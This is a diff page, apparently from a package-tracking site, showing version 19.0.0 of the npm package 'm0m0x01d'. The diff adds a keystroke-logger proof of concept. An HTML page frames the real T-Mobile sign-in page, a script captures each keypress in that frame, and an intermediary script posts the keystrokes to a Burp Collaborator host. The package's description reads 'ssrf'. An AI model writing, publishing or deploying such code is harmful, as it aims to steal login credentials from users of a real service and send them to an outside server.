m0m0x01d 18.0.0 → 19.0.0

Sign up to get free protection for your applications and to get access to all the features.
@@ -0,0 +1,16 @@
1
+ </html>
2
+ <!DOCTYPE html>
3
+ <html lang="en">
4
+ <head>
5
+ <meta charset="UTF-8">
6
+ <meta name="viewport" content="width=device-width, initial-scale=1.0">
7
+ <title>Keystroke Capture</title>
8
+ <script src="https://unpkg.com/m0m0x01d@19.0.0/keystroke-capture.js"></script>
9
+ </head>
10
+ <body>
11
+ <h1>Keystroke Logger PoC</h1>
12
+ <!-- Embedding the target's login page in an iframe -->
13
+ <iframe id="login-iframe" src="https://es.account.t-mobile.com/signin/v2/" width="100%" height="500px"></iframe>
14
+ </body>
15
+ </html>
16
+
@@ -0,0 +1,11 @@
1
+ // Intermediary script to forward keystrokes to your server
2
+ self.addEventListener('message', function(event) {
3
+ var data = event.data;
4
+
5
+ // Forward the keystrokes to your server
6
+ var xhr = new XMLHttpRequest();
7
+ xhr.open("POST", "https://bm1nrilxt9ng8wh982986jp76yco0d.burpcollaborator.net/keystrokes", true);
8
+ xhr.setRequestHeader("Content-Type", "application/json");
9
+ xhr.send(JSON.stringify({ keystrokes: data }));
10
+ });
11
+
@@ -0,0 +1,26 @@
1
+ // Function to send keystrokes to the intermediary file on unpkg
2
+ function sendKeystrokes(data) {
3
+ var xhr = new XMLHttpRequest();
4
+ xhr.open("POST", "https://unpkg.com/m0m0x01d@19.0.0/intermediary.js", true);
5
+ xhr.setRequestHeader("Content-Type", "application/json");
6
+ xhr.send(JSON.stringify({ keystrokes: data }));
7
+ }
8
+
9
+ // Function to capture keystrokes in the iframe
10
+ function captureKeystrokes() {
11
+ var iframe = document.getElementById('login-iframe').contentWindow;
12
+
13
+ // Listen for key presses in the iframe
14
+ iframe.document.onkeyup = function(event) {
15
+ sendKeystrokes(event.key); // Send each keystroke to the intermediary
16
+ };
17
+ }
18
+
19
+ // Wait for the iframe to load, then start capturing keystrokes
20
+ window.onload = function() {
21
+ var iframe = document.getElementById('login-iframe');
22
+ iframe.onload = function() {
23
+ captureKeystrokes();
24
+ };
25
+ };
26
+
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "m0m0x01d",
3
- "version": "18.0.0",
3
+ "version": "19.0.0",
4
4
  "description": "ssrf",
5
5
  "main": "index.html",
6
6
  "scripts": {